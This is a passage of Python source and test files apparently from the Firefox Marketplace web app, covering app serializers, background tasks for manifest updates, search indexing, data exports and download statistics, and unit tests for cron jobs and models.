current_upsell.free = upsold
current_upsell.save()
elif current_upsell:
# We're deleting the upsell.
log.debug('[1@%s] Deleting the app upsell' % obj.pk)
current_upsell.delete()
def save_price(self, obj, price):
premium = obj.premium
if not premium:
premium = AddonPremium()
premium.addon = obj
premium.price = Price.objects.active().get(price=price)
premium.save()
def validate_device_types(self, attrs, source):
if attrs.get('device_types') is None:
raise serializers.ValidationError('This field is required.')
for v in attrs['device_types']:
if v not in amo.DEVICE_LOOKUP.keys():
raise serializers.ValidationError(
str(v) + ' is not one of the available choices.')
return attrs
def validate_price(self, attrs, source):
if attrs.get('premium_type', None) not in (amo.ADDON_FREE,
amo.ADDON_FREE_INAPP):
valid_prices = Price.objects.exclude(
price='0.00').values_list('price', flat=True)
price = attrs.get('price')
if not (price and Decimal(price) in valid_prices):
raise serializers.ValidationError(
'Premium app specified without a valid price. Price can be'
' one of %s.' % (', '.join('"%s"' % str(p)
for p in valid_prices),))
return attrs
def restore_object(self, attrs, instance=None):
# restore_object creates or updates a model instance, during
# input validation.
extras = []
# Upsell bits are handled here because we need to remove it
# from the attrs dict before deserializing.
upsold = attrs.pop('upsold.free', None)
if upsold is not None:
extras.append((self.save_upsold, upsold))
price = attrs.pop('price', None)
if price is not None:
extras.append((self.save_price, price))
device_types = attrs['device_types']
if device_types:
extras.append((self.save_device_types, device_types))
del attrs['device_types']
instance = super(AppSerializer, self).restore_object(
attrs, instance=instance)
for f, v in extras:
f(instance, v)
return instance
def save_object(self, obj, **kwargs):
# this only gets called if validation succeeds.
m2m = getattr(obj, '_m2m_data', {})
cats = m2m.pop('categories', None)
super(AppSerializer, self).save_object(obj, **kwargs)
# Categories are handled here because we can't look up
# existing ones until the initial save is done.
self.save_categories(obj, cats)
class SimpleAppSerializer(AppSerializer):
"""
App serializer with fewer fields (and fewer db queries as a result).
Used as a base for FireplaceAppSerializer and CollectionAppSerializer.
"""
previews = SimplePreviewSerializer(many=True, required=False,
source='all_previews')
class Meta(AppSerializer.Meta):
exclude = ['absolute_url', 'app_type', 'categories', 'created',
'default_locale', 'payment_account', 'supported_locales',
'weekly_downloads', 'upsold', 'tags']
########NEW FILE########
__FILENAME__ = tasks
import datetime
import hashlib
import json
import logging
import os
import shutil
import subprocess
import time
from django.conf import settings
from django.contrib.auth.models import AnonymousUser
from django.core.files.storage import default_storage as storage
from django.core.urlresolvers import reverse
from django.template import Context, loader
import pytz
import requests
from celery import chord
from celery.exceptions import RetryTaskError
from celeryutils import task
from pyelasticsearch.exceptions import ElasticHttpNotFoundError
from requests.exceptions import RequestException
from test_utils import RequestFactory
from tower import ugettext as _
import amo
import mkt
from addons.models import Addon
from amo.decorators import use_master, write
from amo.helpers import absolutify
from amo.utils import chunked, days_ago, JSONEncoder, send_mail_jinja
from editors.models import RereviewQueue
from files.models import FileUpload
from files.utils import WebAppParser
from lib.es.utils import get_indices
from lib.metrics import get_monolith_client
from lib.post_request_task.task import task as post_request_task
from mkt.constants.regions import RESTOFWORLD
from mkt.developers.tasks import (_fetch_manifest, fetch_icon, pngcrush_image,
resize_preview, validator)
from mkt.webapps.models import AppManifest, Webapp, WebappIndexer
from mkt.webapps.utils import get_locale_properties
from users.models import UserProfile
from users.utils import get_task_user
task_log = logging.getLogger('z.task')
def _get_content_hash(content):
return 'sha256:%s' % hashlib.sha256(content).hexdigest()
def _log(webapp, message, rereview=False, exc_info=False):
if rereview:
message = u'(Re-review) ' + unicode(message)
task_log.info(u'[Webapp:%s] %s' % (webapp, unicode(message)),
exc_info=exc_info)
@task
@write
def update_manifests(ids, **kw):
retry_secs = 3600
task_log.info('[%s@%s] Update manifests.' %
(len(ids), update_manifests.rate_limit))
check_hash = kw.pop('check_hash', True)
retries = kw.pop('retries', {})
# Since we'll be logging the updated manifest change to the users log,
# we'll need to log in as user.
amo.set_user(get_task_user())
for id in ids:
_update_manifest(id, check_hash, retries)
if retries:
try:
update_manifests.retry(args=(retries.keys(),),
kwargs={'check_hash': check_hash,
'retries': retries},
eta=datetime.datetime.now() +
datetime.timedelta(seconds=retry_secs),
max_retries=5)
except RetryTaskError:
_log(id, 'Retrying task in %d seconds.' % retry_secs)
return retries
def notify_developers_of_failure(app, error_message, has_link=False):
if (app.status not in amo.WEBAPPS_APPROVED_STATUSES or
RereviewQueue.objects.filter(addon=app).exists()):
# If the app isn't public, or has already been reviewed, we don't
# want to send the mail.
return
# FIXME: how to integrate with commbadge?
for author in app.authors.all():
context = {
'error_message': error_message,
'SITE_URL': settings.SITE_URL,
'MKT_SUPPORT_EMAIL': settings.MKT_SUPPORT_EMAIL,
'has_link': has_link
}
to = [author.email]
with author.activate_lang():
# Re-fetch the app to get translations in the right language.
context['app'] = Webapp.objects.get(pk=app.pk)
subject = _(u'Issue with your app "{app}" on the Firefox '
u'Marketplace').format(**context)
send_mail_jinja(subject,
'webapps/emails/update_manifest_failure.txt',
context, recipient_list=to)
def _update_manifest(id, check_hash, failed_fetches):
webapp = Webapp.objects.get(pk=id)
version = webapp.versions.latest()
file_ = version.files.latest()
_log(webapp, u'Fetching webapp manifest')
if not file_:
_log(webapp, u'Ignoring, no existing file')
return
# Fetch manifest, catching and logging any exception.
try:
content = _fetch_manifest(webapp.manifest_url)
except Exception, e:
msg = u'Failed to get manifest from %s. Error: %s' % (
webapp.manifest_url, e)
failed_fetches[id] = failed_fetches.get(id, 0) + 1
if failed_fetches[id] == 3:
# This is our 3rd attempt, let's send the developer(s) an email to
# notify him of the failures.
notify_developers_of_failure(webapp, u'Validation errors:\n' + msg)
elif failed_fetches[id] >= 4:
# This is our 4th attempt, we should already have notified the
# developer(s). Let's put the app in the re-review queue.
_log(webapp, msg, rereview=True, exc_info=True)
if webapp.status in amo.WEBAPPS_APPROVED_STATUSES:
RereviewQueue.flag(webapp, amo.LOG.REREVIEW_MANIFEST_CHANGE,
msg)
del failed_fetches[id]
else:
_log(webapp, msg, rereview=False, exc_info=True)
return
# Check hash.
if check_hash:
hash_ = _get_content_hash(content)
if file_.hash == hash_:
_log(webapp, u'Manifest the same')
return
_log(webapp, u'Manifest different')
# Validate the new manifest.
upload = FileUpload.objects.create()
upload.add_file([content], webapp.manifest_url, len(content),
is_webapp=True)
validator(upload.pk)
upload = FileUpload.objects.get(pk=upload.pk)
if upload.validation:
v8n = json.loads(upload.validation)
if v8n['errors']:
v8n_url = absolutify(reverse(
'mkt.developers.upload_detail', args=[upload.uuid]))
msg = u'Validation errors:\n'
for m in v8n['messages']:
if m['type'] == u'error':
msg += u'* %s\n' % m['message']
msg += u'\nValidation Result:\n%s' % v8n_url
_log(webapp, msg, rereview=True)
if webapp.status in amo.WEBAPPS_APPROVED_STATUSES:
notify_developers_of_failure(webapp, msg, has_link=True)
RereviewQueue.flag(webapp, amo.LOG.REREVIEW_MANIFEST_CHANGE,
msg)
return
else:
_log(webapp,
u'Validation for upload UUID %s has no result' % upload.uuid)
# Get the old manifest before we overwrite it.
new = json.loads(content)
old = webapp.get_manifest_json(file_)
# New manifest is different and validates, update version/file.
try:
webapp.manifest_updated(content, upload)
except:
_log(webapp, u'Failed to create version', exc_info=True)
# Check for any name changes at root and in locales. If any were added or
# updated, send to re-review queue.
msg = []
rereview = False
# Some changes require a new call to IARC's SET_STOREFRONT_DATA.
iarc_storefront = False
if old and old.get('name') != new.get('name'):
rereview = True
iarc_storefront = True
msg.append(u'Manifest name changed from "%s" to "%s".' % (
old.get('name'), new.get('name')))
new_version = webapp.versions.latest()
# Compare developer_name between old and new version using the property
# that fallbacks to the author name instead of using the db field directly.
# This allows us to avoid forcing a re-review on old apps which didn't have
# developer name in their manifest initially and upload a new version that
# does, providing that it matches the original author name.
if version.developer_name != new_version.developer_name:
rereview = True
iarc_storefront = True
msg.append(u'Developer name changed from "%s" to "%s".'
% (version.developer_name, new_version.developer_name))
# Get names in "locales" as {locale: name}.
locale_names = get_locale_properties(new, 'name', webapp.default_locale)
# Check changes to default_locale.
locale_changed = webapp.update_default_locale(new.get('default_locale'))
if locale_changed:
msg.append(u'Default locale changed from "%s" to "%s".'
% locale_changed)
# Update names
crud = webapp.update_names(locale_names)
if any(crud.values()):
webapp.save()
if crud.get('added'):
rereview = True
msg.append(u'Locales added: %s' % crud.get('added'))
if crud.get('updated'):
rereview = True
msg.append(u'Locales updated: %s' % crud.get('updated'))
# Check if supported_locales changed and update if so.
webapp.update_supported_locales(manifest=new)
if rereview:
msg = ' '.join(msg)
_log(webapp, msg, rereview=True)
if webapp.status in amo.WEBAPPS_APPROVED_STATUSES:
RereviewQueue.flag(webapp, amo.LOG.REREVIEW_MANIFEST_CHANGE, msg)
if iarc_storefront:
webapp.set_iarc_storefront_data()
@task
def update_cached_manifests(id, **kw):
try:
webapp = Webapp.objects.get(pk=id)
except Webapp.DoesNotExist:
_log(id, u'Webapp does not exist')
return
if not webapp.is_packaged:
return
# Rebuilds the packaged app mini manifest and stores it in cache.
webapp.get_cached_manifest(force=True)
_log(webapp, u'Updated cached mini manifest')
@task
@write
def add_uuids(ids, **kw):
for chunk in chunked(ids, 50):
for app in Webapp.objects.filter(id__in=chunk):
# Save triggers the creation of a guid if the app doesn't currently
# have one.
app.save()
@task
@write
def update_supported_locales(ids, **kw):
"""
Task intended to run via command line to update all apps' supported locales
based on the current version.
"""
for chunk in chunked(ids, 50):
for app in Webapp.objects.filter(id__in=chunk):
try:
if app.update_supported_locales():
_log(app, u'Updated supported locales')
except Exception:
_log(app, u'Updating supported locales failed.', exc_info=True)
@post_request_task(acks_late=True)
@write
def index_webapps(ids, **kw):
task_log.info('Indexing apps %s-%s. [%s]' % (ids[0], ids[-1], len(ids)))
index = kw.pop('index', WebappIndexer.get_index())
# Note: If reindexing is currently occurring, `get_indices` will return
# more than one index.
indices = get_indices(index)
es = WebappIndexer.get_es(urls=settings.ES_URLS)
qs = Webapp.indexing_transformer(Webapp.with_deleted.no_cache().filter(
id__in=ids))
for obj in qs:
doc = WebappIndexer.extract_document(obj.id, obj)
for idx in indices:
WebappIndexer.index(doc, id_=obj.id, es=es, index=idx)
@post_request_task(acks_late=True)
@write
def unindex_webapps(ids, **kw):
if not ids:
return
task_log.info('Un-indexing apps %s-%s. [%s]' % (ids[0], ids[-1], len(ids)))
index = kw.pop('index', WebappIndexer.get_index())
# Note: If reindexing is currently occurring, `get_indices` will return
# more than one index.
indices = get_indices(index)
es = WebappIndexer.get_es(urls=settings.ES_URLS)
for id_ in ids:
for idx in indices:
try:
WebappIndexer.unindex(id_=id_, es=es, index=idx)
except ElasticHttpNotFoundError:
# Ignore if it's not there.
task_log.info(
u'[Webapp:%s] Unindexing app but not found in index' % id_)
@task
def dump_app(id, **kw):
from mkt.webapps.serializers import AppSerializer
# Because @robhudson told me to.
# Note: not using storage because all these operations should be local.
target_dir = os.path.join(settings.DUMPED_APPS_PATH, 'apps',
str(id / 1000))
target_file = os.path.join(target_dir, str(id) + '.json')
try:
obj = Webapp.objects.get(pk=id)
except Webapp.DoesNotExist:
task_log.info(u'Webapp does not exist: {0}'.format(id))
return
req = RequestFactory().get('/')
req.user = AnonymousUser()
req.REGION = RESTOFWORLD
if not os.path.exists(target_dir):
os.makedirs(target_dir)
task_log.info('Dumping app {0} to {1}'.format(id, target_file))
res = AppSerializer(obj, context={'request': req}).data
json.dump(res, open(target_file, 'w'), cls=JSONEncoder)
return target_file
@task
def clean_apps(pks, **kw):
app_dir = os.path.join(settings.DUMPED_APPS_PATH, 'apps')
rm_directory(app_dir)
return pks
@task(ignore_result=False)
def dump_apps(ids, **kw):
task_log.info(u'Dumping apps {0} to {1}. [{2}]'
.format(ids[0], ids[-1], len(ids)))
for id in ids:
dump_app(id)
@task
def zip_apps(*args, **kw):
today = datetime.datetime.today().strftime('%Y-%m-%d')
files = ['apps'] + compile_extra_files(date=today)
return compress_export(filename=today, files=files)
def rm_directory(path):
if os.path.exists(path):
shutil.rmtree(path)
def dump_all_apps_tasks():
all_pks = (Webapp.objects.visible()
.values_list('pk', flat=True)
.order_by('pk'))
return [dump_apps.si(pks) for pks in chunked(all_pks, 100)]
@task
def export_data(name=None):
from mkt.collections.tasks import dump_all_collections_tasks
today = datetime.datetime.today().strftime('%Y-%m-%d')
if name is None:
name = today
root = settings.DUMPED_APPS_PATH
directories = ['apps', 'collections']
for directory in directories:
rm_directory(os.path.join(root, directory))
files = directories + compile_extra_files(date=today)
chord(dump_all_apps_tasks() + dump_all_collections_tasks(),
compress_export.si(filename=name, files=files)).apply_async()
def compile_extra_files(date):
# Put some .txt files in place.
context = Context({'date': date, 'url': settings.SITE_URL})
files = ['license.txt', 'readme.txt']
if not os.path.exists(settings.DUMPED_APPS_PATH):
os.makedirs(settings.DUMPED_APPS_PATH)
created_files = []
for f in files:
template = loader.get_template('webapps/dump/apps/' + f)
dest = os.path.join(settings.DUMPED_APPS_PATH, f)
open(dest, 'w').write(template.render(context))
created_files.append(f)
return created_files
@task
def compress_export(filename, files):
# Note: not using storage because all these operations should be local.
target_dir = os.path.join(settings.DUMPED_APPS_PATH, 'tarballs')
target_file = os.path.join(target_dir, filename + '.tgz')
if not os.path.exists(target_dir):
os.makedirs(target_dir)
# Put some .txt files in place.
cmd = ['tar', 'czf', target_file, '-C',
settings.DUMPED_APPS_PATH] + files
task_log.info(u'Creating dump {0}'.format(target_file))
subprocess.call(cmd)
return target_file
@task(ignore_result=False)
def dump_user_installs(ids, **kw):
task_log.info(u'Dumping user installs {0} to {1}. [{2}]'
.format(ids[0], ids[-1], len(ids)))
for user_id in ids:
try:
user = UserProfile.objects.get(pk=user_id)
except UserProfile.DoesNotExist:
task_log.info('User profile does not exist: {0}'.format(user_id))
continue
hash = hashlib.sha256('%s%s' % (str(user.id),
settings.SECRET_KEY)).hexdigest()
target_dir = os.path.join(settings.DUMPED_USERS_PATH, 'users', hash[0])
target_file = os.path.join(target_dir, '%s.json' % hash)
if not os.path.exists(target_dir):
try:
os.makedirs(target_dir)
except OSError:
pass # Catch race condition if file exists now.
# Gather data about user.
installed = []
zone = pytz.timezone(settings.TIME_ZONE)
for install in user.installed_set.filter(addon__type=amo.ADDON_WEBAPP):
try:
app = install.addon
except Addon.DoesNotExist:
continue
installed.append({
'id': app.id,
'slug': app.app_slug,
'installed': pytz.utc.normalize(
zone.localize(install.created)).strftime(
'%Y-%m-%dT%H:%M:%S')
})
data = {
'user': hash,
'region': user.region,
'lang': user.lang,
'installed_apps': installed,
}
task_log.info('Dumping user {0} to {1}'.format(user.id, target_file))
json.dump(data, open(target_file, 'w'), cls=JSONEncoder)
@task
def zip_users(*args, **kw):
# Note: not using storage because all these operations should be local.
today = datetime.datetime.utcnow().strftime('%Y-%m-%d')
target_dir = os.path.join(settings.DUMPED_USERS_PATH, 'tarballs')
target_file = os.path.join(target_dir, '{0}.tgz'.format(today))
if not os.path.exists(target_dir):
os.makedirs(target_dir)
# Put some .txt files in place.
context = Context({'date': today, 'url': settings.SITE_URL})
files = ['license.txt', 'readme.txt']
for f in files:
template = loader.get_template('webapps/dump/users/' + f)
dest = os.path.join(settings.DUMPED_USERS_PATH, 'users', f)
open(dest, 'w').write(template.render(context))
cmd = ['tar', 'czf', target_file, '-C',
settings.DUMPED_USERS_PATH, 'users']
task_log.info(u'Creating user dump {0}'.format(target_file))
subprocess.call(cmd)
return target_file
def _fix_missing_icons(id):
try:
webapp = Webapp.objects.get(pk=id)
except Webapp.DoesNotExist:
_log(id, u'Webapp does not exist')
return
# Check for missing icons. If we find one important size missing, call
# fetch_icon for this app.
dirname = webapp.get_icon_dir()
destination = os.path.join(dirname, '%s' % webapp.id)
for size in (64, 128):
filename = '%s-%s.png' % (destination, size)
if not storage.exists(filename):
_log(id, u'Webapp is missing icon size %d' % (size, ))
return fetch_icon(webapp)
@task
@write
def fix_missing_icons(ids, **kw):
for id in ids:
_fix_missing_icons(id)
def _regenerate_icons_and_thumbnails(pk):
try:
webapp = Webapp.objects.get(pk=pk)
except Webapp.DoesNotExist:
_log(id, u'Webapp does not exist')
return
# Previews.
for preview in webapp.all_previews:
# Re-resize each preview by calling the task with the image that we
# have and asking the task to only deal with the thumbnail. We no
# longer have the original, but it's fine, the image should be large
# enough for us to generate a thumbnail.
resize_preview.delay(preview.image_path, preview, generate_image=False)
# Icons. The only thing we need to do is crush the 64x64 icon.
icon_path = os.path.join(webapp.get_icon_dir(), '%s-64.png' % webapp.id)
pngcrush_image.delay(icon_path)
@task
@write
def regenerate_icons_and_thumbnails(ids, **kw):
for pk in ids:
_regenerate_icons_and_thumbnails(pk);
@task
@write
def import_manifests(ids, **kw):
for app in Webapp.objects.filter(id__in=ids):
for version in app.versions.all():
try:
file_ = version.files.latest()
if file_.status == amo.STATUS_DISABLED:
file_path = file_.guarded_file_path
else:
file_path = file_.file_path
manifest = WebAppParser().get_json_data(file_path)
m, c = AppManifest.objects.get_or_create(
version=version, manifest=json.dumps(manifest))
if c:
task_log.info(
'[Webapp:%s] Imported manifest for version %s' % (
app.id, version.id))
else:
task_log.info(
'[Webapp:%s] App manifest exists for version %s' % (
app.id, version.id))
except Exception as e:
task_log.info('[Webapp:%s] Error loading manifest for version '
'%s: %s' % (app.id, version.id, e))
def _get_trending(app_id, region=None):
"""
Calculate trending.
a = installs from 7 days ago to now
b = installs from 28 days ago to 8 days ago, averaged per week
trending = (a - b) / b if a > 100 and b > 1 else 0
"""
client = get_monolith_client()
kwargs = {'app-id': app_id}
if region:
kwargs['region'] = region.slug
today = datetime.datetime.today()
# If we query monolith with interval=week and the past 7 days
# crosses a Monday, Monolith splits the counts into two. We want
# the sum over the past week so we need to `sum` these.
try:
count_1 = sum(
c['count'] for c in
client('app_installs', days_ago(7), today, 'week', **kwargs)
if c.get('count'))
except ValueError as e:
task_log.info('Call to ES failed: {0}'.format(e))
count_1 = 0
# If count_1 isn't more than 100, stop here to avoid extra Monolith calls.
if not count_1 > 100:
return 0.0
# Get the average installs for the prior 3 weeks. Don't use the `len` of
# the returned counts because of week boundaries.
try:
count_3 = sum(
c['count'] for c in
client('app_installs', days_ago(28), days_ago(8), 'week', **kwargs)
if c.get('count')) / 3
except ValueError as e:
task_log.info('Call to ES failed: {0}'.format(e))
count_3 = 0
if count_3 > 1:
return (count_1 - count_3) / count_3
else:
return 0.0
@task
@write
def update_trending(ids, **kw):
count = 0
times = []
for app in Webapp.objects.filter(id__in=ids).no_transforms():
count += 1
t_start = time.time()
# Calculate global trending, then per-region trending below.
value = _get_trending(app.id)
if value:
trending, created = app.trending.get_or_create(
region=0, defaults={'value': value})
if not created:
trending.update(value=value)
for region in mkt.regions.REGIONS_DICT.values():
value = _get_trending(app.id, region)
if value:
trending, created = app.trending.get_or_create(
region=region.id, defaults={'value': value})
if not created:
trending.update(value=value)
times.append(time.time() - t_start)
task_log.info('Trending calculated for %s apps. Avg time overall: '
'%0.2fs' % (count, sum(times) / count))
@task
@write
def update_downloads(ids, **kw):
client = get_monolith_client()
count = 0
for app in Webapp.objects.filter(id__in=ids).no_transforms():
appid = {'app-id': app.id}
# Get weekly downloads.
query = {
'query': {'match_all': {}},
'facets': {
'installs': {
'date_histogram': {
'value_field': 'app_installs',
'interval': 'week',
'key_field': 'date',
},
'facet_filter': {
'and': [
{'term': appid},
{'range': {'date': {
'gte': days_ago(8).date().strftime('%Y-%m-%d'),
'lte': days_ago(1).date().strftime('%Y-%m-%d'),
}}}
]
}
}
},
'size': 0}
try:
resp = client.raw(query)
# If we query monolith with interval=week and the past 7 days
# crosses a Monday, Monolith splits the counts into two. We want
# the sum over the past week so we need to `sum` these.
weekly = sum(
c['total'] for c in
resp.get('facets', {}).get('installs', {}).get('entries')
if c.get('total'))
except Exception as e:
task_log.info('Call to ES failed: {0}'.format(e))
weekly = 0
# Get total downloads.
query = {'query': {'match_all': {}},
'facets': {
'installs': {
'statistical': {'field': 'app_installs'},
'facet_filter': {'term': appid}}},
'size': 0}
try:
resp = client.raw(query)
total = resp.get('facets', {}).get('installs', {}).get('total', 0)
except Exception as e:
task_log.info('Call to ES failed: {0}'.format(e))
total = 0
# Update Webapp object, if needed.
update = False
signal = False
if weekly != app.weekly_downloads:
update = True
signal = True
if total != app.total_downloads:
update = True
if update:
# Note: Calling `update` will trigger a reindex on the app if
# `_signal` is True. Since we only index `weekly_downloads`, we
# can skip reindexing if this hasn't changed.
count += 1
app.update(weekly_downloads=weekly, total_downloads=total,
_signal=signal)
task_log.info('App downloads updated for %s out of %s apps.'
% (count, len(ids)))
class PreGenAPKError(Exception):
"""
An error encountered while trying to pre-generate an APK.
"""
@task
@use_master
def pre_generate_apk(app_id, **kw):
app = Webapp.objects.get(pk=app_id)
manifest_url = app.get_manifest_url()
task_log.info('pre-generating APK for app {a} at {url}'
.format(a=app, url=manifest_url))
if not manifest_url:
raise PreGenAPKError('Webapp {w} has an empty manifest URL'
.format(w=app))
try:
res = requests.get(settings.PRE_GENERATE_APK_URL,
params={'manifestUrl': manifest_url})
res.raise_for_status()
except RequestException, exc:
raise PreGenAPKError('Error pre-generating APK for app {a} at {url}; '
'generator={gen} (SSL cert ok?); '
'{e.__class__.__name__}: {e}'
.format(a=app, url=manifest_url, e=exc,
gen=settings.PRE_GENERATE_APK_URL))
# The factory returns a binary APK blob but we don't need it.
res.close()
del res
########NEW FILE########
__FILENAME__ = test_crons
# -*- coding: utf-8 -*-
import os
import time
from datetime import date, datetime, timedelta
from django.conf import settings
from django.core.files.storage import default_storage as storage
from django.core.management import call_command
import mock
from nose.tools import eq_
import amo
import amo.tests
from addons.models import Addon
from devhub.models import ActivityLog
from users.models import UserProfile
import mkt
from mkt.api.models import Nonce
from mkt.site.fixtures import fixture
from mkt.webapps.cron import (clean_old_signed, mkt_gc, update_app_trending,
update_downloads)
from mkt.webapps.models import Webapp
from mkt.webapps.tasks import _get_trending
class TestWeeklyDownloads(amo.tests.TestCase):
def setUp(self):
self.app = Webapp.objects.create(type=amo.ADDON_WEBAPP,
status=amo.STATUS_PUBLIC)
def get_app(self):
return Webapp.objects.get(pk=self.app.pk)
@mock.patch('mkt.webapps.tasks.get_monolith_client')
def test_weekly_downloads(self, _mock):
client = mock.Mock()
raw = {
'facets': {
'installs': {
'_type': 'date_histogram',
'entries': [
{'count': 3,
'time': 1390780800000,
'total': 19.0},
{'count': 62,
'time': 1391385600000,
'total': 236.0}
]
}
}
}
client.raw.return_value = raw
_mock.return_value = client
eq_(self.app.weekly_downloads, 0)
update_downloads([self.app.pk])
self.app.reload()
eq_(self.app.weekly_downloads, 255)
@mock.patch('mkt.webapps.tasks.get_monolith_client')
def test_total_downloads(self, _mock):
client = mock.Mock()
raw = {
'facets': {
'installs': {
u'_type': u'statistical',
u'count': 49,
u'total': 6638.0
}
}
}
client.raw.return_value = raw
_mock.return_value = client
eq_(self.app.total_downloads, 0)
update_downloads([self.app.pk])
self.app.reload()
eq_(self.app.total_downloads, 6638)
@mock.patch('mkt.webapps.tasks.get_monolith_client')
def test_monolith_error(self, _mock):
client = mock.Mock()
client.side_effect = ValueError
client.raw.side_effect = Exception
_mock.return_value = client
update_downloads([self.app.pk])
self.app.reload()
eq_(self.app.weekly_downloads, 0)
eq_(self.app.total_downloads, 0)
class TestCleanup(amo.tests.TestCase):
def setUp(self):
self.file = os.path.join(settings.SIGNED_APPS_REVIEWER_PATH,
'1', 'x.z')
def test_not_cleaned(self):
storage.open(self.file, 'w')
clean_old_signed()
assert storage.exists(self.file)
def test_cleaned(self):
storage.open(self.file, 'w')
clean_old_signed(-60)
assert not storage.exists(self.file)
@mock.patch('lib.crypto.packaged.sign_app')
class TestSignApps(amo.tests.TestCase):
fixtures = fixture('webapp_337141')
def setUp(self):
self.app = Addon.objects.get(id=337141)
self.app.update(is_packaged=True)
self.app2 = amo.tests.app_factory(
name=u'Mozillaball ょ', app_slug='test',
is_packaged=True, version_kw={'version': '1.0',
'created': None})
self.app3 = amo.tests.app_factory(
name='Test app 3', app_slug='test3', status=amo.STATUS_REJECTED,
is_packaged=True, version_kw={'version': '1.0',
'created': None})
def test_by_webapp(self, sign_mock):
v1 = self.app.get_version()
call_command('sign_apps', webapps=str(v1.pk))
file1 = v1.all_files[0]
assert sign_mock.called_with(((file1.file_path,
file1.signed_file_path),))
def test_all(self, sign_mock):
v1 = self.app.get_version()
v2 = self.app2.get_version()
call_command('sign_apps')
file1 = v1.all_files[0]
file2 = v2.all_files[0]
eq_(len(sign_mock.mock_calls), 2)
eq_(sign_mock.mock_calls[0][1][:2],
(file1.file_path, file1.signed_file_path))
eq_(sign_mock.mock_calls[1][1][:2],
(file2.file_path, file2.signed_file_path))
class TestUpdateTrending(amo.tests.TestCase):
def setUp(self):
self.app = Webapp.objects.create(type=amo.ADDON_WEBAPP,
status=amo.STATUS_PUBLIC)
@mock.patch('mkt.webapps.tasks._get_trending')
def test_trending_saved(self, _mock):
_mock.return_value = 12.0
update_app_trending()
eq_(self.app.get_trending(), 12.0)
for region in mkt.regions.REGIONS_DICT.values():
eq_(self.app.get_trending(region=region), 12.0)
# Test running again updates the values as we'd expect.
_mock.return_value = 2.0
update_app_trending()
eq_(self.app.get_trending(), 2.0)
for region in mkt.regions.REGIONS_DICT.values():
eq_(self.app.get_trending(region=region), 2.0)
@mock.patch('mkt.webapps.tasks.get_monolith_client')
def test_get_trending(self, _mock):
client = mock.Mock()
client.return_value = [
{'count': 133.0, 'date': date(2013, 8, 26)},
{'count': 122.0, 'date': date(2013, 9, 2)},
]
_mock.return_value = client
# 1st week count: 133 + 122 = 255
# Prior 3 weeks get averaged: (133 + 122) / 3 = 85
# (255 - 85) / 85 = 2.0
eq_(_get_trending(self.app.id), 2.0)
@mock.patch('mkt.webapps.tasks.get_monolith_client')
def test_get_trending_threshold(self, _mock):
client = mock.Mock()
client.return_value = [
{'count': 49.0, 'date': date(2013, 8, 26)},
{'count': 50.0, 'date': date(2013, 9, 2)},
]
_mock.return_value = client
# 1st week count: 49 + 50 = 99
# 99 is less than 100 so we return 0.0.
eq_(_get_trending(self.app.id), 0.0)
@mock.patch('mkt.webapps.tasks.get_monolith_client')
def test_get_trending_monolith_error(self, _mock):
client = mock.Mock()
client.side_effect = ValueError
_mock.return_value = client
eq_(_get_trending(self.app.id), 0.0)
@mock.patch('os.stat')
@mock.patch('os.listdir')
@mock.patch('os.remove')
class TestGarbage(amo.tests.TestCase):
def setUp(self):
self.user = UserProfile.objects.create(
email='[email protected]', name='gc_test')
amo.log(amo.LOG.CUSTOM_TEXT, 'testing', user=self.user,
created=datetime(2001, 1, 1))
def test_garbage_collection(self, rm_mock, ls_mock, stat_mock):
eq_(ActivityLog.objects.all().count(), 1)
mkt_gc()
eq_(ActivityLog.objects.all().count(), 0)
def test_nonce(self, rm_mock, ls_mock, stat_mock):
nonce = Nonce.objects.create(nonce='a', timestamp=1, client_key='b')
nonce.update(created=self.days_ago(2))
eq_(Nonce.objects.count(), 1)
mkt_gc()
eq_(Nonce.objects.count(), 0)
def test_dump_delete(self, rm_mock, ls_mock, stat_mock):
ls_mock.return_value = ['lol']
stat_mock.return_value = StatMock(days_ago=1000)
mkt_gc()
assert rm_mock.call_args_list[0][0][0].endswith('lol')
def test_new_no_delete(self, rm_mock, ls_mock, stat_mock):
ls_mock.return_value = ['lol']
stat_mock.return_value = StatMock(days_ago=1)
mkt_gc()
assert not rm_mock.called
class StatMock(object):
def __init__(self, days_ago):
self.st_mtime = time.mktime(
(datetime.now() - timedelta(days_ago)).timetuple())
self.st_size = 100
########NEW FILE########
__FILENAME__ = test_models
# -*- coding: utf-8 -*-
import functools
import hashlib
import json
import os
import shutil
import unittest
import uuid
import zipfile
from datetime import datetime, timedelta
from django.conf import settings
from django.core import mail
from django.core.files.storage import default_storage as storage
from django.core.urlresolvers import reverse
from django.db.models.signals import post_delete, post_save
from django.test.utils import override_settings
from django.utils.translation import ugettext_lazy as _
import mock
import pyelasticsearch
from elasticutils.contrib.django import S
from nose.tools import eq_, ok_, raises
import amo
import mkt
from addons.models import (Addon, AddonCategory, AddonDeviceType,
BlacklistedSlug, Category, Preview, version_changed)
from addons.signals import version_changed as version_changed_signal
from amo.helpers import absolutify
from amo.tests import app_factory, version_factory
from amo.utils import to_language
from constants.applications import DEVICE_TYPES
from constants.payments import PROVIDER_BANGO, PROVIDER_BOKU
from editors.models import EscalationQueue, RereviewQueue
from files.models import File
from files.utils import WebAppParser
from lib.crypto import packaged
from lib.crypto.tests import mock_sign
from lib.iarc.utils import (DESC_MAPPING, INTERACTIVES_MAPPING,
REVERSE_DESC_MAPPING, REVERSE_INTERACTIVES_MAPPING)
from mkt.constants import apps
from mkt.developers.models import (AddonPaymentAccount, PaymentAccount,
SolitudeSeller)
from mkt.files.tests.test_models import UploadTest as BaseUploadTest
from mkt.site.fixtures import fixture
from mkt.site.tests import DynamicBoolFieldsTestMixin
from mkt.submit.tests.test_views import BasePackagedAppTest, BaseWebAppTest
from mkt.webapps.models import (AddonExcludedRegion, AppFeatures, AppManifest,
ContentRating, Geodata, get_excluded_in,
IARCInfo, Installed, RatingDescriptors,
RatingInteractives, Webapp, WebappIndexer)
from mkt.prices.models import AddonPremium, Price
from users.models import UserProfile
from versions.models import update_status, Version
class TestWebapp(amo.tests.TestCase):
fixtures = fixture('prices')
def add_payment_account(self, app, provider_id, user=None):
if not user:
user = UserProfile.objects.create(email='a', username='b')
payment = PaymentAccount.objects.create(
solitude_seller=SolitudeSeller.objects.create(user=user,
uuid=uuid.uuid4()),
provider=provider_id,
user=user,
seller_uri=uuid.uuid4(),
uri=uuid.uuid4())
return AddonPaymentAccount.objects.create(
addon=app, payment_account=payment, product_uri=uuid.uuid4())
def test_delete_reason(self):
"""Test deleting with a reason gives the reason in the mail."""
reason = u'trêason'
w = Webapp.objects.create(status=amo.STATUS_PUBLIC)
w.name = u'é'
